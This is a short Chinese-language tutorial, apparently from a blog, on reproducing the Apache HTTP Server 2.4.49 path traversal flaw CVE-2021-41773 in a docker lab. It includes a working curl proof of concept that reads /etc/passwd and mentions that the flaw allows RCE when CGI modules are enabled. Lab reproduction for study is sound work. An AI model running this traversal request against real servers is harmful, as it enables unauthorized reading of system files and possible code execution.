Apache CVE-2021-41773 漏洞攻略

漏洞简介

该漏洞是由于Apache HTTP Server 2.4.49版本存在⽬录穿越漏洞,在路径穿越⽬录
<Directory/>Require all granted</Directory>允许被访问的的情况下(默认开启),攻击者可利⽤该路径穿越漏洞读取到Web⽬录之外的其他⽂件在服务端开启了gi或cgid这两个mod的情况下,这个路径穿越漏洞将可以执⾏任意cgi命令(RCE)

影响版本

Apache HTTP Server 2.4.49
某些Apache HTTPd 2.4.50也存在此漏洞

环境搭建

docker pull blueteamsteve/cve-2021-41773:no-cgid
docker run -d -p 8080:80 97308de4753d

漏洞复现

http://172.16.1.78:8080/

1.使⽤poc

curl http://172.16.1.78:8080/cgi-bin/../../../../etc/passwd

2.⼯具验证

相关推荐
芬兰y10 小时前
使用Apache POI(Java)创建docx文档和表格
java·python·apache
老哥不老2 天前
使用Apache POI实现Java操作Office文件:从Excel、Word到PPT模板写入
java·apache·excel
畅云客2 天前
Apache与Nginx网站压测对比
java·nginx·apache
hi星尘3 天前
深入理解Apache Kafka
分布式·kafka·apache
龙大大L3 天前
第五章:5.1 ESP32物联网应用 - MQTT协议深度教程
java·单片机·struts·apache
pingxiaozhao4 天前
在Ubuntu内网环境中为Gogs配置HTTPS访问(通过Apache反向代理使用IP地址)
ubuntu·https·apache
SeaTunnel4 天前
【同步教程】基于Apache SeaTunnel从MySQL同步到MySQL——Demo方舟计划
大数据·人工智能·apache·etl
密码小丑4 天前
玄机-apache日志分析
网络·笔记·apache
SeaTunnel4 天前
Apache SeaTunnel & Amazon Bedrock 助力生成式AI 应用规模化生产实践
人工智能·apache
RestCloud4 天前
2025常用的ETL 产品推荐:助力企业激活数据价值
数据仓库·apache·etl·kettle·数据集成·ibm·informatica